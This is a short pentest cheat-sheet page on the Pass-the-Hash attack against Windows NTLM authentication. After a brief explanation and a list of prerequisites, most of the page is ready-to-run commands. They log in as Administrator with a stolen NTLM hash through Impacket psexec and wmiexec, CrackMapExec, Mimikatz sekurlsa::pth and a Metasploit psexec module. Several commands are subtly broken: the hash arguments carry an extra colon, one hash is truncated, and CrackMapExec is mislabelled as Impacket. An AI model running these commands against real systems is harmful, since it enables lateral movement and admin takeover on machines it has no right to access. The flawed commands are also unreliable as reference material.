💥 Pass the Hash

🧠 What’s the Deal?

PtH is an attack where an adversary uses NTLM hashes (instead of plaintext passwords) to authenticate to remote systems. This works because NTLM authentication does not require the plaintext password — the hash itself is accepted as proof of identity.

🧰 Gear Up (Prereqs)

Below are the few requirements for this attack

The NTLM hash of a user account (usually from LSASS dump, SAM dump, or tools like Mimikatz).
A system in the domain (or reachable via SMB/WinRM) that accepts NTLM authentication.

🚀 Launch Sequence (How-To)

We can use multiple tools to achieve the same, Given in below examples.

Using Impacket psexec

impacket-psexec DOMAIN/Administrator@10.10.10.5 -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Using Impacket wmiexec

impacket-wmiexec DOMAIN/Administrator@10.10.10.5 -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586

Using Impacket CrackMapExec

crackmapexec smb 10.10.10.5 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c

Using Mimikatz in Windows

sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:powershell.exe

Using Metasploit

use exploit/windows/smb/psexec

Resources

Passing the hash toolkit

🧠 What’s the Deal?​

🧰 Gear Up (Prereqs)​

🚀 Launch Sequence (How-To)​

Using Impacket psexec​

Using Impacket wmiexec​

Using Impacket CrackMapExec​

Using Mimikatz in Windows​

Using Metasploit​

Resources​